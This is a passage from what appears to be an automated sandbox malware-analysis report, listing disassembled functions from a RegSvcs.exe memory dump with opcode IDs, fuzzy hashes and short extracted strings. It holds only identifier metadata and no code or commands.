                                                                                                          • Opcode ID: 15abfce3d7802503761730bdd2e1bfdc89627a271f40229392f58dc1fefefec2
                                                                                                          • Instruction ID: 395ba922b1e5f16120b3263f96050b01d4319bdeceafd37055625cb51df6610c
                                                                                                          • Opcode Fuzzy Hash: 15abfce3d7802503761730bdd2e1bfdc89627a271f40229392f58dc1fefefec2
                                                                                                          • Instruction Fuzzy Hash: 81719F30E0022A8FDB58CFA8D9546ADB7F2FF94708F10896AD4069B355DBB1DC45CB91
                                                                                                          Function 06D28458 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2125118731
                                                                                                          • Opcode ID: 19bce7066d0f4a6a2c003cd48d628c411480143f566646fb84ae4586b3925a0a
                                                                                                          • Instruction ID: 31a22bab059314e5a506e6799e233e9a352aaaa23fe829e82697d6aadc18c251
                                                                                                          • Opcode Fuzzy Hash: 19bce7066d0f4a6a2c003cd48d628c411480143f566646fb84ae4586b3925a0a
                                                                                                          • Instruction Fuzzy Hash: 34B14930E0021A8FDB54DF68D99466EB7B7FF98305F248829D0059B354DB74DC8ACB90
                                                                                                          Function 06D28870 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LR^q$LR^q$$^q$$^q
                                                                                                          • API String ID: 0-2454687669
                                                                                                          • Opcode ID: fd228c398e0eb5dde827f5ea3de48328837535b95e45abc2ca8af74684921403
                                                                                                          • Instruction ID: 2c529c96effa3c47734b3c2481287a5f529d486a1d82f35c7ae08d79d5437cd2
                                                                                                          • Opcode Fuzzy Hash: fd228c398e0eb5dde827f5ea3de48328837535b95e45abc2ca8af74684921403
                                                                                                          • Instruction Fuzzy Hash: A751D430B002168FDB58DF68D944A6AB7F6FF98308F148568E4059B3A5DF35EC49CBA1